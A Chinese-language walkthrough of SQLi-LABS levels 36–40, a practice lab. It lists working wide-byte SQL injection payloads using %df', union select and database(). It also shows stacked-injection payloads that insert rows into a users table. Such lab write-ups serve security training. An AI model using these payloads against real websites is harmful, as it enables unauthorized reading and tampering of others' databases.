SQLi-LABS 36关
1.本关依旧是宽字节注入
2.测试闭合方式
?id=1 //正常显示
?id=1' //显示错误
?id=1%df' //显示错误
?id=1%df' --+ //显示正常
3.测试回显点
?id=-1%df%27%20union%20select%201,2,3--+
4.使用union select查询数据库名
?id=-1%df%27%20union%20select%201,database(),3--+
SQLi-LABS 37关
1.本关又是post传参,所以需要抓包
用户名密码分别输入1,进行抓包,然后发送到重放器
在用户名处进行闭合测试
2.测试之后得到闭合方式为
1%df' --+
3.测试回显点
4.爆数据库名
SQLi-LABS 38关
1.本关使用常规的联合查询方式就可以秒了
但是这关本意是想考差堆叠注入
堆叠注入就是将两个sql语句使用分号隔开,但是依旧执行两条语句
所以,我们这里使用堆叠注入
2.首先测试闭合方式
单引号闭合
3.其次测试是否存在堆叠注入
测试方法就是我们往数据库中插入一条信息,看看是否访问的到
使用语句:
?id=-1';insert into users(id,username,password) values('77','czx','333')--+
我们这里插入了id为77的信息,接下来输入id=77看是否能够查询到这条信息
结果显而易见,存在堆叠注入
SQLi-LABS 39关
和38关一样,都是堆叠注入,只是变成了数字型
当然,联合注入等常规方式也是可以的
SQLi-LABS 40关
1.依旧是堆叠注入
2.测试闭合
?id=1' //无回显
?id=1'--+ //依旧没有回显
?id=1')--+ //回显正常
所以是')--+闭合方式
3.使用insert进行测试是否存在堆叠注入
?id=-1'); insert into users values ('88','xx','88')--+
查询id为88的信息
插入成功,存在堆叠注入
